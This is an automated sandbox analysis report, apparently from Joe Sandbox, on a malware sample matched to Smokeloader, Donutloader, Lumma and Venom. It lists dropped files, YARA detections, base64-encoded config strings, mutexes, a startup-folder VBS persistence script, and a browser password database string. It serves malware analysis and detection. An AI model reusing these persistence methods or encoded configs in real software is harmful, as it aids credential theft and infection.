Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03055DE0	16_2_03055DE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_0306EC06	16_2_0306EC06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 16_2_03070CB7	16_2_03070CB7
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D7CC0	19_2_6C8D7CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8F5CD4	19_2_6C8F5CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D4CD0	19_2_6C8D4CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E1C21	19_2_6C8E1C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E4DE0	19_2_6C8E4DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E8D6E	19_2_6C8E8D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D8E20	19_2_6C8D8E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E2890	19_2_6C8E2890
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E4930	19_2_6C8E4930
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D2B21	19_2_6C8D2B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8DD5D0	19_2_6C8DD5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8DC010	19_2_6C8DC010
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8D92D0	19_2_6C8D92D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_6C8E0210	19_2_6C8E0210
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_00568C7E	19_2_00568C7E
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_028E1EC8	19_2_028E1EC8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_028E2640	19_2_028E2640
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_028E1EB8	19_2_028E1EB8
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF90B1	19_2_05FF90B1
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF077C	19_2_05FF077C
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: 19_2_05FF23C8	19_2_05FF23C8
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C864CD0	20_2_6C864CD0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C867CC0	20_2_6C867CC0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C885CD4	20_2_6C885CD4
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C871C21	20_2_6C871C21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C874DE0	20_2_6C874DE0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C878D6E	20_2_6C878D6E
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C868E20	20_2_6C868E20
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C872890	20_2_6C872890
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C874930	20_2_6C874930
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C862B21	20_2_6C862B21
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C86D5D0	20_2_6C86D5D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C86C010	20_2_6C86C010
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C8692D0	20_2_6C8692D0
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_6C870210	20_2_6C870210
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: 20_2_0251167A	20_2_0251167A

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\2D42.exe 4F7DB945B8F377AD28938F23F283E04454818FA0D9C4C692A30BCE2D12B66389
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\8EC7.exe AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\EF14.exe 505968DFF5E73B6DB05CAAA86EA34633140EC3B7BB75B19167AF7CE4AF641259

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 030593B0 appears 39 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0305FCA0 appears 202 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Code function: String function: 6C878D20 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Code function: String function: 6C8E8D20 appears 35 times

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 1092

Source: EF14.exe.1.dr

Static PE information: Number of sections : 12 > 10

Source: 8EC7.exe.1.dr	Static PE information: No import functions for PE file found
Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: No import functions for PE file found
Source: adjijwj.1.dr	Static PE information: No import functions for PE file found
Source: 2D42.exe.1.dr	Static PE information: No import functions for PE file found

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 19.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 19.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 26.2.vm.exe.4e30000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3222675712.0000000006020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941543133.00000000001D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000013.00000002.4107139559.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3069005495.0000000003C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000003.00000002.1941477566.00000000001A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.1718024777.00000000004E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001A.00000002.3108160771.00000000005A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000014.00000002.3065926594.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000013.00000002.4121890771.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0000001A.00000002.3209596948.0000000004E30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 00000000.00000002.1717820306.00000000001E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: adjijwj.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Static PE information: Section .text
Source: adjijwj.1.dr	Static PE information: Section .text

Source: 19.2.vm.exe.4e40000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Settings.cs	Base64 encoded string: 'uv876R64GyPQROS6Pcq+tT2rujm6QhOA2jKz3+72iK0vssZ7tRu9W1NfcaQ5yk3K4leNInPIlyvrm/sWNe6YUSzW9MnjujJ8wA3fVO6kqY4=', 'tBbcnyqIuxWvE/Aa008Phm66l0gx08l3V72N0uezc1BvWV+aVFh/K2LjDSmziiX4d1we58iQkTKHp5hlA6J3ArDNNUTcH31I6D+8IIWmVEXPfFcr7grctRvtFWbh8/WW', 'vlrU2ttL4QCN9XP+miA1iO2Zi1Qo5KKeTfPUgLmvXsgl1b/ZXBNeN/RykY5FXUbGAFb/hcKmdGI2lxq9dyDNOg==', 'jajjt4fLdfeySHLjOUN+WU7vKFN/tv6flHwdN63QqNLvwdiPerPjqi8pJYhlDxutlcONhE6KmVeSyHLXzp1X0ivMLOia3ounzEFu+OufC35pSXOr0AgnutA9Hm2WMXLR5SrKu9Ep2d9bPbB7jBc3VXBVjkPHm+BjMjy64M6HAubGgc8bZ4x9RmkpsgBYOzwKBmFDp7rKGTxhnrnem674/IV8HtJhbUivlbelAfQbN92NlB/IZHSII0WCgZyWHfjXPeAh7ScQvm1glooPfQyjEFujB5EgoLg8/Q+UZ9OyLZY=', '/3HMGRMO5mfkdekqR4Zafv717iumQMzpVLF6A9pHRaBxVKyvDxb55/QnfojY3GM4MZFgEKqs9lZExa/oUaQFQQ==', 'l439UHfThXI7Tvv4tLPkRk4LgJxneAQ3SRt6rij4oIvNCNJh0dGkWYtmoBCaQASy+UxakX8pDIHBYYo6I0jgiA==', 'H36CdwWLE8twm6SaEVP4wCqEXttEdFNm1/TG0CIbxJ6QscVZsS9u+iDyyURaAEJfbnGnfKxPezH51YuRdKUEGw==', 'X+lWHHhlIbk/ipVH2n6hOx1tpa9s2D5Jo0CwgGIgu5WBtb6gmcLOKhvfywa/wW2BsaqNON/3eZUEUOX0Z6TMoQ=='

Source: 2D42.exe.1.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 2D42.exe.1.dr, PowerShellLoader.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 26.2.vm.exe.4e30000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 19.2.vm.exe.4e40000.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@40/44@12/16

Source: C:\Users\user\AppData\Local\Temp\8EC7.exe

Code function: 7_2_00007FF64166F5B0 LookupPrivilegeValueA,AdjustTokenPrivileges,OpenProcessToken,

7_2_00007FF64166F5B0

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 16_2_03079C80 CoCreateInstance,

16_2_03079C80

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\adjijwj

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2736:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Mutant created: \Sessions\1\BaseNamedObjects\8yUscnjrUY
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2344:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Mutant created: \Sessions\1\BaseNamedObjects\aqswvfsywrpgi
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2004
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5724

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\8EC7.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EF14.exe

File opened: C:\Windows\system32\0dac501b8d19111c7bce9a7ce47575ef7a8b648351979b7f5b84fa7f76790c54AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Windows\explorer.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM WIN32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lm.exe, 00000014.00000003.2662227068.0000000003129000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000014.00000003.2658565085.0000000003205000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe

Virustotal: Detection: 58%

Source: EF14.exe	String found in binary or memory: .1h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= depgithub.com/edsrzf/mmap-gov1.1.0h1:6EUwBLQ/Mcr1EYLE4Tn1VdW1A4ckqCQWZBw8Hr0kjpQ= depgithub.com/filecoin-project/go-addressv1.1.0h1:ofdtUtEsNxkIxkDw67ecSmvtzaVSdcea4boAmLbnHfE= depgithub.com/filecoin-pr
Source: EF14.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: EF14.exe	String found in binary or memory: seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanL
Source: EF14.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: EF14.exe	String found in binary or memory: eap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listrunti
Source: EF14.exe	String found in binary or memory: 4z/Oni01D2Gm1Du/vo7/ADDErEP0DNhYaqvcF1p/cFSLGEgObC3rn8jqKTnzuNp4wHD4+XFMSIRNAIIzjOX/KZNc3PRk/O0O7ASRoZctsH2Bd1nJGgtmCymXVz7Rpdu4Nm50g77Trg6nTXIg1ur3ovBmkCw7pL+BrZx45wBgh/hLl9XRe424S9Lh2ZXPjbs4697O00XFV32GKA29/QTxEtCdWE4CQix59dE/Tc+MNcfWwyxJV1ePU1UKPn9EjTGGdTeh
Source: EF14.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: EF14.exe	String found in binary or memory: net/addrselect.go
Source: EF14.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.base32decode
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.init
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewSecp256k1Address
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewDelegatedAddress
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewBLSAddress
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/address.go
Source: EF14.exe	String found in binary or memory: github.com/filecoin-project/go-address@v1.1.0/constants.go

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess

Source: unknown	Process created: C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe "C:\Users\user\Desktop\e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\adjijwj C:\Users\user\AppData\Roaming\adjijwj
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\8EC7.exe C:\Users\user\AppData\Local\Temp\8EC7.exe
Source: C:\Users\user\AppData\Local\Temp\8EC7.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\EF14.exe C:\Users\user\AppData\Local\Temp\EF14.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2D42.exe C:\Users\user\AppData\Local\Temp\2D42.exe
Source: C:\Users\user\AppData\Local\Temp\2D42.exe	Process created: C:\Users\user\AppData\Local\Temp\2D42.exe "C:\Users\user\AppData\Local\Temp\2D42.exe" -HOSTRUNAS
